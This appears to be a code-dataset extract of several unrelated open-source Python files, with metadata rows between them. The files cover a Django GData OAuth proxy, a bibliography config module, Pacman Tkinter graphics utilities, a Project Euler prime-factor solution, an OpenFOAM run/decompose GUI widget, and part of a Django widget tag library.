'approval_page_url': url,
'page_name': 'Authorization Required',
}
return context
def templatePath(self):
"""Override this method to define a rendering template
"""
pass
class OAuthVerifyToken(RequestHandler):
"""Verify request token and redirect user.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/oauth/verify$', self, name='gdata_oauth_verify'),
]
return patterns
def get(self):
service = oauth_helper.createDocsService(self.data)
oauth_helper.checkOAuthVerifier(service, self.data)
next = self.request.GET.get('next','/')
self.redirect.toUrl(next)
return self.response
class PopupOAuthRedirectPage(RequestHandler):
"""Redirects popup page to Google Documents.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/popup/oauth/redirect$', self,
name='gdata_popup_oauth_redirect'),
]
return patterns
def checkAccess(self):
self.check.isUser()
def get(self):
access_token = oauth_helper.getAccessToken(self.data.user)
if access_token:
url = self.redirect.urlOf('gdata_popup_oauth_verified')
else:
service = oauth_helper.createDocsService(self.data)
next = '%s?next=%s' % (self.redirect.urlOf('gdata_oauth_verify'),
self.redirect.urlOf('gdata_popup_oauth_verified'))
url = oauth_helper.generateOAuthRedirectURL(
service, self.data.user,
next)
self.redirect.toUrl(url)
return self.response
class PopupOAuthVerified(RequestHandler):
""" Calls parent window's methods to indicate successful login.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/popup/oauth/verified$', self,
name='gdata_popup_oauth_verified')
]
return patterns
def checkAccess(self):
self.check.canAccessGoogleDocs()
def get(self):
html = (
"<html><body><script type='text/javascript'>"
" window.opener.melange.gdata.loginSuccessful();"
" window.close();"
"</script></body></html>"
)
self.response.write(html)
class MakeRequest(RequestHandler):
"""Work as a proxy view and deliver JS request to GData server.
"""
def djangoURLPatterns(self):
patterns = [
django_url(r'^gdata/make_request$', self, name='gdata_make_request')
]
return patterns
def checkAccess(self):
self.check.canAccessGoogleDocs()
def post(self):
params = self.request.POST
gdata_service = oauth_helper.createGDataService(self.data)
service_name = params['service_name']
method = params.get('method', 'GET')
data = simplejson.loads(params.get('data', '{}'))
url = params['url']
if not url.startswith('https'):
host = settings.GDATA_HOSTS[service_name]
url = 'https://%s%s' % (host, url)
alt = params.get('alt')
if alt == 'json':
url = url + '?alt=json'
headers = simplejson.loads(params.get('headers','{}'))
if not 'GData-Version' in headers:
headers['GData-Version'] = '1.0'
response = gdata_service.request(method, url, data, headers=headers)
response_data = response.read().decode('utf-8')
self.response.write(response_data)
| apache-2.0 | 6,183,347,659,760,637,000 | 27.6 | 81 | 0.654463 | false |
sciunto-org/CiteBib | libcitebib/config.py | 1 | 9239 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>
#
# Author: Francois Boulogne <fboulogne at sciunto dot org>, 2012
import configparser
import os
class ConfigBibtex():
"""
Load bibtex files from configuration files
:param name: name of the configuration
:param location: path of the config directory
"""
def __init__(self, name='bibtex.conf', location='~/.config/citebib'):
filename = str(name)
filepath = os.path.join(os.path.expanduser(location), filename)
self.config = configparser.ConfigParser()
self.config.read(filepath)
def get_bibtex_paths(self):
"""
Get a list containing paths of bibtex files
"""
paths = []
for section in self.config.sections():
path = os.path.expanduser(self.config[section].get('path'))
paths.append(path)
return paths
class ConfigFormat():
"""
Load custom formats from configuration files
:param format: biblio format (raw, latex or bibtex)
:param name: name of the configuration
:param location: path of the config directory
:returns: the configuration
"""
def __init__(self, format, name='default.conf', location='~/.config/citebib'):
self.format = format
filename = str(name)
filepath = os.path.join(os.path.expanduser(location), str(format), filename)
self.config = configparser.ConfigParser()
self.config.read(filepath)
def get_reqfields(self, section):
"""
Return required fields
:param section: Section of the config file
:returns: list
:raises KeyError: wrong section
:raises ValueError: wrong format
"""
if self.format == 'bibtex':
content = []
try:
for element in self.config[section]:
if self.config[section].getboolean(element):
content.append(element)
except KeyError:
raise ValueError('The section does not exists %s' % section)
elif self.format == 'latex' or self.format == 'raw':
content = []
#TODO: possibility must be read from config
#Then, use a set to make sure each appears once
possibilities = ('publisher', 'institution', 'booktitle', 'title',
'author', 'pages', 'volume', 'editor',
'year', 'bookpublisher', 'journal')
try:
line = self.config[section].get('format')
except KeyError:
raise ValueError('The section does not exists: %s' % section)
for possibility in possibilities:
if possibility in line:
content.append(possibility)
else:
raise ValueError('Wrong format: %s' % self.format)
return(content)
def get_style(self, section):
"""
Return the style (relevant only for latex and raw format)
:param section: Section of the config file
:returns: string
"""
if self.format == 'latex' or self.format == 'raw':
return self.config[section].get('format')
else:
raise ValueError('Wrong format: %s' % self.format)
def get_number_authors(self, section):
"""
Return the number of authors (relevant only for latex and raw format)
:param section: Section of the config file
:returns: float
"""
if self.format == 'latex' or self.format == 'raw':
return self.config[section].getint('authorlength')
else:
raise ValueError('Wrong format: %s' % self.format)
def check_default_config(location='~/.config/citebib'):
"""
Check if default configuration files exists.
If it does not, create them
"""
os.makedirs(os.path.expanduser(location), exist_ok=True)
# Write bibtex location config file
file = os.path.join(os.path.expanduser(location), 'bibtex.conf')
bibfile = os.path.join(os.path.expanduser(location), 'example.bib')
if not os.access(file, os.F_OK):
with open(file, 'w') as fh:
fh.write("[example]\n")
ex_path = "path=" + os.path.join(location, 'example.bib')
fh.write(ex_path)
with open(bibfile, 'w') as fh:
fh.write("""@article{Cesar2013,
\tauthor = {C{\\'e}sar, J.},
\tjournal = {Nice Journal},
\tpages = {12--23},
\ttitle = {An amazing title},
\tvolume = {12},
\tyear = {2013},
}\n
""")
# Write printing mode config files
formats = ('latex', 'bibtex', 'raw')
for format in formats:
path = os.path.join(os.path.expanduser(location), format)
if not os.path.exists(path):
os.makedirs(path)
file = os.path.join(path, 'default.conf')
if not os.access(file, os.F_OK):
write_default_config(file, format)
def write_default_config(inifile, format):
"""
This function is a wrapper to write default config files
:param inifile: ini file name
:param format: biblio format (latex or bibtex)
"""
if format == 'latex':
_write_default_config_latex(inifile)
elif format == 'bibtex':
_write_default_config_bibtex(inifile)
elif format == 'raw':
_write_default_config_raw(inifile)
else:
raise ValueError('Wrong format: %s' % format)
def _write_default_config_latex(inifile):
"""
Write a default configuration file for latex
:param inifile: ini file name
"""
fields = {
'article': ('author, journal, \\textbf{volume}, pages (year).'),
'book': ('author, title, publisher (year).'),
'phdthesis' : ('author, Ph.D. thesis, school (year).'),
'inproceedings' : ('author, title in booktitle (year).'),
'unpublished': ('author, title'),
}
config = configparser.ConfigParser()
for entry in fields:
content = {'format': fields[entry], 'authorlength': 0} # TODO
config[entry] = content
with open(inifile, 'w') as configfile:
config.write(configfile)
def _write_default_config_raw(inifile):
"""
Write a default configuration file for raw
:param inifile: ini file name
"""
fields = {
'article': ('author, journal, volume, pages (year).'),
'book': ('author, title, publisher (year).'),
'phdthesis' : ('author, Ph.D. thesis, school (year).'),
'inproceedings' : ('author, title in booktitle (year).'),
'unpublished': ('author, title.'),
}
config = configparser.ConfigParser()
for entry in fields:
content = {'format': fields[entry], 'authorlength': 0} # TODO
config[entry] = content
with open(inifile, 'w') as configfile:
config.write(configfile)
def _write_default_config_bibtex(inifile):
"""
Write a default configuration file for bibtex
:param inifile: ini file name
"""
# TODO: this is messy. Look for suitable configparser function
# TODO: prefer a smart ordering (like alpha)
reqfields = {
'article': ('author', 'title', 'journal', 'volume', 'year', 'pages'),
'book': ('author', 'editor', 'title', 'publisher', 'year'),
'booklet': ('title'),
'conference': ('author', 'title', 'booktitle', 'year'),
'inproceedings': ('author', 'title', 'booktitle', 'year'),
'inbook': ('author', 'editor', 'title', 'chapter', 'pages', 'publisher', 'year'),
'incollection': ('author', 'title', 'bookpublisher', 'year'),
'manual': ('title'),
'mastersthesis': ('author', 'title', 'school', 'year'),
'misc': (''),
'phdthesis': ('author', 'title', 'school', 'year'),
'proceedings': ('title', 'year'),
'techreport': ('author', 'title', 'institution', 'year'),
'unpublished': ('author', 'title'),
}
fields = ('author', 'editor', 'publisher', 'bookpublisher',
'title', 'booktitle', 'journal', 'volume',
'year', 'pages', 'institution', 'school')
config = configparser.ConfigParser()
content = {}
for el in reqfields:
for field in fields:
if field in reqfields[el]:
content.update({field: True})
else:
content.update({field: False})
config[el] = content
with open(inifile, 'w') as configfile:
config.write(configfile)
if __name__ == '__main__':
pass
| gpl-3.0 | -4,720,389,608,554,132,000 | 33.602996 | 97 | 0.583613 | false |
DominikDitoIvosevic/Uni | AI/lab2/graphicsUtils.py | 1 | 11867 | # graphicsUtils.py
# ----------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# ([email protected]) and Dan Klein ([email protected]).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel ([email protected]).
import sys
import math
import random
import string
import time
import types
import Tkinter
#from PIL import ImageTk, Image
_Windows = sys.platform == 'win32' # True if on Win95/98/NT
_root_window = None # The root window for graphics output
_canvas = None # The canvas which holds graphics
_canvas_xs = None # Size of canvas object
_canvas_ys = None
_canvas_x = None # Current position on canvas
_canvas_y = None
_canvas_col = None # Current colour (set to black below)
_canvas_tsize = 12
_canvas_tserifs = 0
def formatColor(r, g, b):
return '#%02x%02x%02x' % (int(r * 255), int(g * 255), int(b * 255))
def colorToVector(color):
return map(lambda x: int(x, 16) / 256.0, [color[1:3], color[3:5], color[5:7]])
if _Windows:
_canvas_tfonts = ['times new roman', 'lucida console']
else:
_canvas_tfonts = ['times', 'lucidasans-24']
pass # XXX need defaults here
def sleep(secs):
global _root_window
if _root_window == None:
time.sleep(secs)
else:
_root_window.update_idletasks()
_root_window.after(int(1000 * secs), _root_window.quit)
_root_window.mainloop()
def begin_graphics(width=640, height=480, color=formatColor(0, 0, 0), title=None):
global _root_window, _canvas, _canvas_x, _canvas_y, _canvas_xs, _canvas_ys, _bg_color
# Check for duplicate call
if _root_window is not None:
# Lose the window.
_root_window.destroy()
# Save the canvas size parameters
_canvas_xs, _canvas_ys = width - 1, height - 1
_canvas_x, _canvas_y = 0, _canvas_ys
_bg_color = color
# Create the root window
_root_window = Tkinter.Tk()
_root_window.protocol('WM_DELETE_WINDOW', _destroy_window)
_root_window.title(title or 'Graphics Window')
_root_window.resizable(0, 0)
# Create the canvas object
try:
_canvas = Tkinter.Canvas(_root_window, width=width, height=height)
_canvas.pack()
draw_background()
_canvas.update()
except:
_root_window = None
raise
# Bind to key-down and key-up events
_root_window.bind( "<KeyPress>", _keypress )
_root_window.bind( "<KeyRelease>", _keyrelease )
_root_window.bind( "<FocusIn>", _clear_keys )
_root_window.bind( "<FocusOut>", _clear_keys )
_root_window.bind( "<Button-1>", _leftclick )
_root_window.bind( "<Button-2>", _rightclick )
_root_window.bind( "<Button-3>", _rightclick )
_root_window.bind( "<Control-Button-1>", _ctrl_leftclick)
_clear_keys()
_leftclick_loc = None
_rightclick_loc = None
_ctrl_leftclick_loc = None
def _leftclick(event):
global _leftclick_loc
_leftclick_loc = (event.x, event.y)
def _rightclick(event):
global _rightclick_loc
_rightclick_loc = (event.x, event.y)
def _ctrl_leftclick(event):
global _ctrl_leftclick_loc
_ctrl_leftclick_loc = (event.x, event.y)
def wait_for_click():
while True:
global _leftclick_loc
global _rightclick_loc
global _ctrl_leftclick_loc
if _leftclick_loc != None:
val = _leftclick_loc
_leftclick_loc = None
return val, 'left'
if _rightclick_loc != None:
val = _rightclick_loc
_rightclick_loc = None
return val, 'right'
if _ctrl_leftclick_loc != None:
val = _ctrl_leftclick_loc
_ctrl_leftclick_loc = None
return val, 'ctrl_left'
sleep(0.05)
def draw_background():
corners = [(0,0), (0, _canvas_ys), (_canvas_xs, _canvas_ys), (_canvas_xs, 0)]
polygon(corners, _bg_color, fillColor=_bg_color, filled=True, smoothed=False)
def _destroy_window(event=None):
sys.exit(0)
# global _root_window
# _root_window.destroy()
# _root_window = None
#print "DESTROY"
def end_graphics():
global _root_window, _canvas, _mouse_enabled
try:
try:
sleep(1)
if _root_window != None:
_root_window.destroy()
except SystemExit, e:
print 'Ending graphics raised an exception:', e
finally:
_root_window = None
_canvas = None
_mouse_enabled = 0
_clear_keys()
def clear_screen(background=None):
global _canvas_x, _canvas_y
_canvas.delete('all')
draw_background()
_canvas_x, _canvas_y = 0, _canvas_ys
def polygon(coords, outlineColor, fillColor=None, filled=1, smoothed=1, behind=0, width=1):
c = []
for coord in coords:
c.append(coord[0])
c.append(coord[1])
if fillColor == None: fillColor = outlineColor
if filled == 0: fillColor = ""
poly = _canvas.create_polygon(c, outline=outlineColor, fill=fillColor, smooth=smoothed, width=width)
if behind > 0:
_canvas.tag_lower(poly, behind) # Higher should be more visible
return poly
def square(pos, r, color, filled=1, behind=0):
x, y = pos
coords = [(x - r, y - r), (x + r, y - r), (x + r, y + r), (x - r, y + r)]
return polygon(coords, color, color, filled, 0, behind=behind)
def circle(pos, r, outlineColor, fillColor, endpoints=None, style='pieslice', width=2):
x, y = pos
x0, x1 = x - r - 1, x + r
y0, y1 = y - r - 1, y + r
if endpoints == None:
e = [0, 359]
else:
e = list(endpoints)
while e[0] > e[1]: e[1] = e[1] + 360
return _canvas.create_arc(x0, y0, x1, y1, outline=outlineColor, fill=fillColor,
extent=e[1] - e[0], start=e[0], style=style, width=width)
def image(pos, file="../../blueghost.gif"):
x, y = pos
# img = PhotoImage(file=file)
#img = ImageTk.PhotoImage(Image.open(file))
return _canvas.create_image(x, y, image = Tkinter.PhotoImage(file=file), anchor = Tkinter.NW)
def refresh():
_canvas.update_idletasks()
def moveCircle(id, pos, r, endpoints=None):
global _canvas_x, _canvas_y
x, y = pos
# x0, x1 = x - r, x + r + 1
# y0, y1 = y - r, y + r + 1
x0, x1 = x - r - 1, x + r
y0, y1 = y - r - 1, y + r
if endpoints == None:
e = [0, 359]
else:
e = list(endpoints)
while e[0] > e[1]: e[1] = e[1] + 360
#edit(id, ('start', e[0]), ('extent', e[1] - e[0]))
move_to(id, x0, y0)
def edit(id, *args):
_canvas.itemconfigure(id, **dict(args))
def text(pos, color, contents, font='Helvetica', size=12, style='normal', anchor="nw"):
global _canvas_x, _canvas_y
x, y = pos
font = (font, str(size), style)
return _canvas.create_text(x, y, fill=color, text=contents, font=font, anchor=anchor)
def changeText(id, newText, font=None, size=12, style='normal'):
_canvas.itemconfigure(id, text=newText)
if font != None:
_canvas.itemconfigure(id, font=(font, '-%d' % size, style))
def changeColor(id, newColor):
_canvas.itemconfigure(id, fill=newColor)
def line(here, there, color=formatColor(0, 0, 0), width=2):
x0, y0 = here[0], here[1]
x1, y1 = there[0], there[1]
return _canvas.create_line(x0, y0, x1, y1, fill=color, width=width)
##############################################################################
### Keypress handling ########################################################
##############################################################################
# We bind to key-down and key-up events.
_keysdown = {}
_keyswaiting = {}
# This holds an unprocessed key release. We delay key releases by up to
# one call to keys_pressed() to get round a problem with auto repeat.
_got_release = None
def _keypress(event):
global _got_release
#remap_arrows(event)
_keysdown[event.keysym] = 1
_keyswaiting[event.keysym] = 1
# print event.char, event.keycode
_got_release = None
def _keyrelease(event):
global _got_release
#remap_arrows(event)
try:
del _keysdown[event.keysym]
except:
pass
_got_release = 1
def remap_arrows(event):
# TURN ARROW PRESSES INTO LETTERS (SHOULD BE IN KEYBOARD AGENT)
if event.char in ['a', 's', 'd', 'w']:
return
if event.keycode in [37, 101]: # LEFT ARROW (win / x)
event.char = 'a'
if event.keycode in [38, 99]: # UP ARROW
event.char = 'w'
if event.keycode in [39, 102]: # RIGHT ARROW
event.char = 'd'
if event.keycode in [40, 104]: # DOWN ARROW
event.char = 's'
def _clear_keys(event=None):
global _keysdown, _got_release, _keyswaiting
_keysdown = {}
_keyswaiting = {}
_got_release = None
def keys_pressed(d_o_e=Tkinter.tkinter.dooneevent,
d_w=Tkinter.tkinter.DONT_WAIT):
d_o_e(d_w)
if _got_release:
d_o_e(d_w)
return _keysdown.keys()
def keys_waiting():
global _keyswaiting
keys = _keyswaiting.keys()
_keyswaiting = {}
return keys
# Block for a list of keys...
def wait_for_keys():
keys = []
while keys == []:
keys = keys_pressed()
sleep(0.05)
return keys
def remove_from_screen(x,
d_o_e=Tkinter.tkinter.dooneevent,
d_w=Tkinter.tkinter.DONT_WAIT):
_canvas.delete(x)
d_o_e(d_w)
def _adjust_coords(coord_list, x, y):
for i in range(0, len(coord_list), 2):
coord_list[i] = coord_list[i] + x
coord_list[i + 1] = coord_list[i + 1] + y
return coord_list
def move_to(object, x, y=None,
d_o_e=Tkinter.tkinter.dooneevent,
d_w=Tkinter.tkinter.DONT_WAIT):
if y is None:
try: x, y = x
except: raise 'incomprehensible coordinates'
horiz = True
newCoords = []
current_x, current_y = _canvas.coords(object)[0:2] # first point
for coord in _canvas.coords(object):
if horiz:
inc = x - current_x
else:
inc = y - current_y
horiz = not horiz
newCoords.append(coord + inc)
_canvas.coords(object, *newCoords)
d_o_e(d_w)
def move_by(object, x, y=None,
d_o_e=Tkinter.tkinter.dooneevent,
d_w=Tkinter.tkinter.DONT_WAIT, lift=False):
if y is None:
try: x, y = x
except: raise Exception, 'incomprehensible coordinates'
horiz = True
newCoords = []
for coord in _canvas.coords(object):
if horiz:
inc = x
else:
inc = y
horiz = not horiz
newCoords.append(coord + inc)
_canvas.coords(object, *newCoords)
d_o_e(d_w)
if lift:
_canvas.tag_raise(object)
def writePostscript(filename):
"Writes the current canvas to a postscript file."
psfile = file(filename, 'w')
psfile.write(_canvas.postscript(pageanchor='sw',
y='0.c',
x='0.c'))
psfile.close()
ghost_shape = [
(0, - 0.5),
(0.25, - 0.75),
(0.5, - 0.5),
(0.75, - 0.75),
(0.75, 0.5),
(0.5, 0.75),
(- 0.5, 0.75),
(- 0.75, 0.5),
(- 0.75, - 0.75),
(- 0.5, - 0.5),
(- 0.25, - 0.75)
]
if __name__ == '__main__':
begin_graphics()
clear_screen()
ghost_shape = [(x * 10 + 20, y * 10 + 20) for x, y in ghost_shape]
g = polygon(ghost_shape, formatColor(1, 1, 1))
move_to(g, (50, 50))
circle((150, 150), 20, formatColor(0.7, 0.3, 0.0), endpoints=[15, - 15])
sleep(2)
| mit | 2,995,610,118,131,092,000 | 28.593516 | 104 | 0.581444 | false |
NoahBaird/Project-Euler | Problem 3 - Largest prime factor/Python 1.0.py | 1 | 1112 | from math import sqrt
def checkIfDone(num):
if num == 1:
return True
return False
def IsPrime(num):
for i in range(2, int(sqrt(num))):
if num % i == 0:
return False
return True
def findLargestPrimeFactor(num):
done = False
largestFactor = 1
while num % 2 == 0:
num = num / 2
largestFactor = 2
done = checkIfDone(num)
while num % 3 == 0:
num = num / 3
largestFactor = 3
done = checkIfDone(num)
iterator = 1
while not done:
posPrime1 = iterator * 6 - 1
posPrime2 = iterator * 6 + 1
if IsPrime(posPrime1):
while num % posPrime1 == 0:
num = num / posPrime1
largestFactor = posPrime1
if IsPrime(posPrime2):
if num % posPrime2 == 0:
num = num/posPrime2
largestFactor = posPrime2
done = checkIfDone(num)
iterator += 1
return largestFactor
print findLargestPrimeFactor(600851475143)
| mit | 4,260,531,782,545,222,700 | 19.803922 | 42 | 0.504496 | false |
jmarcelogimenez/petroSym | petroSym/run.py | 1 | 11910 | # -*- coding: utf-8 -*-
"""
Created on Tue Aug 25 13:08:19 2015
@author: jgimenez
"""
from PyQt4 import QtGui, QtCore
from run_ui import Ui_runUI
from PyFoam.RunDictionary.ParsedParameterFile import ParsedParameterFile
import os
from reset import *
from time import localtime, strftime, struct_time
from logTab import *
from ExampleThread import *
from utils import *
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class runUI(QtGui.QScrollArea, Ui_runUI):
def __init__(self, parent=None, f=QtCore.Qt.WindowFlags()):
QtGui.QScrollArea.__init__(self, parent)
self.setupUi(self)
class runWidget(runUI):
def __init__(self, currentFolder, solvername):
runUI.__init__(self)
self.solvername = solvername
self.currentFolder = currentFolder
def setCurrentFolder(self, currentFolder, solvername):
self.currentFolder = currentFolder
self.solvername = solvername
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
#Si abro la gui y hay un caso corriendo, desabilito estos botones
if (self.window().runningpid!= -1):
self.pushButton_run.setEnabled(False)
self.pushButton_reset.setEnabled(False)
if self.window().nproc<=1:
self.type_serial.setChecked(True)
self.type_parallel.setChecked(False)
else:
self.type_serial.setChecked(False)
self.type_parallel.setChecked(True)
self.num_proc.setValue(self.window().nproc)
self.pushButton_decompose.setEnabled(False)
self.changeType()
def runCase(self):
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
# if self.window().nproc>1:
# w = QtGui.QMessageBox(QtGui.QMessageBox.Information, "Is the case decomposed?", "Simulation will be done only if case decompositione was done previously. Continue?", QtGui.QMessageBox.Yes|QtGui.QMessageBox.No)
# ret = w.exec_()
# if(QtGui.QMessageBox.No == ret):
# return
#modifico el control dict porque pude haber parado la simulacion
filename = '%s/system/controlDict'%self.currentFolder
parsedData = ParsedParameterFile(filename,createZipped=False)
parsedData['stopAt'] = 'endTime'
parsedData.writeFile()
self.window().removeFilesPostPro()
#retraso un minuto la edicion del control dict
tt = list(localtime())
tt[4] = (tt[4]-1)%60 #Agrego el modulo porque cuando el min es 0, 0-1 = -1
command = 'touch -d "%s" %s'%(strftime("%Y-%m-%d %H:%M:%S", struct_time(tuple(tt))),filename)
os.system(command)
filename1 = '%s/run.log'%self.currentFolder
filename2 = '%s/error.log'%self.currentFolder
self.window().newLogTab('Run',filename1)
if self.window().nproc<=1:
command = '%s -case %s 1> %s 2> %s &'%(self.solvername,self.currentFolder,filename1,filename2)
else:
command = 'mpirun -np %s %s -case %s -parallel 1> %s 2> %s & '%(str(self.window().nproc),self.solvername,self.currentFolder,filename1, filename2)
os.system(command)
if self.window().nproc<=1:
command = 'pidof %s'%self.solvername
else:
command = 'pidof mpirun'
import subprocess
self.window().runningpid = subprocess.check_output(command, shell=True)
self.window().runningpid.replace('\n','') #Me lo devuelve con un espacio al final
self.window().runningpid = int(self.window().runningpid) #Y como string
self.window().save_config()
self.pushButton_run.setEnabled(False)
self.pushButton_reset.setEnabled(False)
self.window().tab_mesh.setEnabled(False)
self.window().refresh_pushButton.setEnabled(False)
leave = [1,5]
for i in range(self.window().treeWidget.topLevelItemCount()):
if i not in leave:
self.window().treeWidget.topLevelItem(i).setDisabled(True)
self.window().findChild(logTab,'%s/run.log'%self.currentFolder).findChild(QtGui.QPushButton,'pushButton_3').setEnabled(True)
self.window().updateLogFiles()
def changeType(self):
nprocOld = self.window().nproc
if self.type_serial.isChecked():
self.num_proc.setEnabled(False)
if nprocOld==1:
self.pushButton_decompose.setText('Apply')
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/fromHelyx/save16.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
else:
self.pushButton_decompose.setText('Apply and Reconstruct Case')
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/fromHelyx/reconstruct16.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.pushButton_decompose.setIcon(icon)
self.pushButton_reconstruct.setEnabled(True)
self.pushButton_reconstruct.setText("Reconstuct Case (use under your responsability)")
self.pushButton_decompose.setEnabled(True)
else:
self.num_proc.setEnabled(True)
self.pushButton_decompose.setText('Apply and Decompose Case')
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/fromHelyx/decompose16.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.pushButton_decompose.setIcon(icon)
self.pushButton_reconstruct.setEnabled(True)
self.pushButton_reconstruct.setText("Reconstuct Case (use under your responsability)")
self.pushButton_decompose.setEnabled(True)
def resetCase(self):
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
w = reset()
result = w.exec_()
if result:
self.window().nproc = 1
command = 'pyFoamClearCase.py %s %s'%(w.getParams(), self.currentFolder)
os.system(command)
#if w.deleteSnapshots():
# command = 'rm -rf %s/postProcessing/snapshots'%self.currentFolder
# os.system(command)
if w.resetFigures():
self.window().resetFigures(w.deletePostpro(),True)
filename = '%s/system/controlDict'%self.currentFolder
parsedData = ParsedParameterFile(filename,createZipped=False)
parsedData['startFrom'] = 'startTime'
parsedData['startTime'] = '0'
parsedData.writeFile()
self.window().typeFile = {}
self.window().pending_files = []
self.window().pending_dirs = []
self.window().updateLogFiles()
self.type_serial.setChecked(True)
self.type_parallel.setChecked(False)
self.changeType()
self.window().save_config()
def decomposeCase(self):
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
nprocOld = self.window().nproc
if self.type_serial.isChecked():
if nprocOld>1:
self.reconstructCase()
self.window().nproc = 1
else:
if nprocOld == self.num_proc.value():
QtGui.QMessageBox.about(self, "ERROR", "Case already decomposed.")
return
if nprocOld>1 and nprocOld != self.num_proc.value():
QtGui.QMessageBox.about(self, "ERROR", "The case must be reconstructed before decompose with other number of processors.")
return
self.window().nproc = self.num_proc.value()
#Si el tiempo es cero debo filtrar algunos campos
if self.currtime=='0':
#modifico el diccionario
filename = '%s/system/decomposeParDict'%(self.currentFolder)
parsedData = ParsedParameterFile(filename,createZipped=False)
parsedData['numberOfSubdomains'] = self.window().nproc
parsedData.writeFile()
#voy a descomponer solo los campos que estoy utilizando en el solver, el resto los dejo intactos
command = 'mv %s %s.bak'%(self.timedir,self.timedir)
os.system(command)
command = 'mkdir %s'%(self.timedir)
os.system(command)
for ifield in self.fields:
command = 'cp %s.bak/%s %s/.'%(self.timedir,ifield,self.timedir)
os.system(command)
filename1 = '%s/decompose.log'%self.currentFolder
filename2 = '%s/error.log'%self.currentFolder
self.window().newLogTab('Decompose',filename1)
command = 'decomposePar -force -case %s -time %s 1> %s 2> %s'%(self.currentFolder,self.currtime,filename1,filename2)
os.system(command)
command = 'rm -r %s'%(self.timedir)
os.system(command)
command = 'mv %s.bak %s'%(self.timedir,self.timedir)
os.system(command)
else:
#Si la corrida ya ha avanzado, hay que descomponer todo
filename = '%s/system/decomposeParDict'%(self.currentFolder)
parsedData = ParsedParameterFile(filename,createZipped=False)
parsedData['numberOfSubdomains'] = self.window().nproc
parsedData.writeFile()
filename1 = '%s/decompose.log'%self.currentFolder
filename2 = '%s/error.log'%self.currentFolder
self.window().newLogTab('Decompose',filename1)
command = 'decomposePar -force -case %s -time %s 1> %s 2> %s'%(self.currentFolder,self.currtime,filename1,filename2)
os.system(command)
self.window().save_config()
w = QtGui.QMessageBox(QtGui.QMessageBox.Information,"Decompose Case","The case has been succesfully decomposed!")
w.exec_()
w.repaint()
QtGui.QApplication.processEvents()
return
def reconstructCase(self):
[self.timedir,self.fields,self.currtime] = currentFields(self.currentFolder,nproc=self.window().nproc)
if int(self.currtime)==0:
QtGui.QMessageBox.about(self, "ERROR", "Time step 0 already exists")
return
else:
filename1 = '%s/reconstruct.log'%self.currentFolder
filename2 = '%s/error.log'%self.currentFolder
self.window().newLogTab('Reconstruct',filename1)
command = 'reconstructPar -case %s -time %s 1> %s 2> %s'%(self.currentFolder,self.currtime,filename1,filename2)
os.system(command)
w = QtGui.QMessageBox(QtGui.QMessageBox.Information,"Reconstruct Case","The case has been succesfully reconstructed!")
w.exec_()
w.repaint()
QtGui.QApplication.processEvents()
return | gpl-2.0 | 8,266,735,191,862,843,000 | 43.610487 | 222 | 0.594207 | false |
palankai/xadrpy | src/xadrpy/core/templates/base.py | 1 | 3454 | from django import template
from django.utils.encoding import smart_str
import re
from django.template.base import FilterExpression, NodeList
from django.template.loader import get_template
kwarg_re = re.compile( r"(?:(\w+)=)?(.+)" )
class WidgetLibrary(template.Library):
def widget_tag_compile_function(self, cls, widget_name):
def widget_tag(parser, token):
"""
{% xwidget 'valami nev' %}
{% xwidget 'valami nev' as valtozo %}
{% xwidget 'valami nev' with 'template.html' as valtozo %}
{% xwidget 'valami nev' with variable as valtozo %}
{% xwidget 'valami nev' with-inline as valtozo %}...{% endxwidget %}
{% xwidget 'valami nev' with-inline %}...{% endxwidget %}
"""
bits = token.split_contents()
#widget_name = parser.compile_filter(bits[1])
args = []
kwargs = {}
asvar = None
templ = None
bits = bits[1:]
if len( bits ) >= 2 and bits[-2] == 'as':
asvar = bits[-1]
bits = bits[:-2]
if len( bits ) >=1 and bits[-1] == 'with-inline':
templ = True
bits = bits[:-1]
elif len( bits ) >=2 and bits[-2] == 'with':
templ = bits[-1]
bits = bits[:-2]
if len( bits ):
for bit in bits:
match = kwarg_re.match( bit )
if not match:
raise template.TemplateSyntaxError( "Malformed arguments to widget tag" )
name, value = match.groups()
if name:
kwargs[name] = parser.compile_filter( value )
else:
args.append( parser.compile_filter( value ) )
if templ == True:
templ = parser.parse(('end'+widget_name,))
parser.delete_first_token()
elif templ:
templ = parser.compile_filter( templ )
return cls(args, kwargs, templ, asvar)
return widget_tag
def widget(self, name):
def inner(cls):
self.tag(name, self.widget_tag_compile_function(cls, name))
return inner
class XWidgetBase(template.Node):
def __init__(self, args, kwargs, template, asvar):
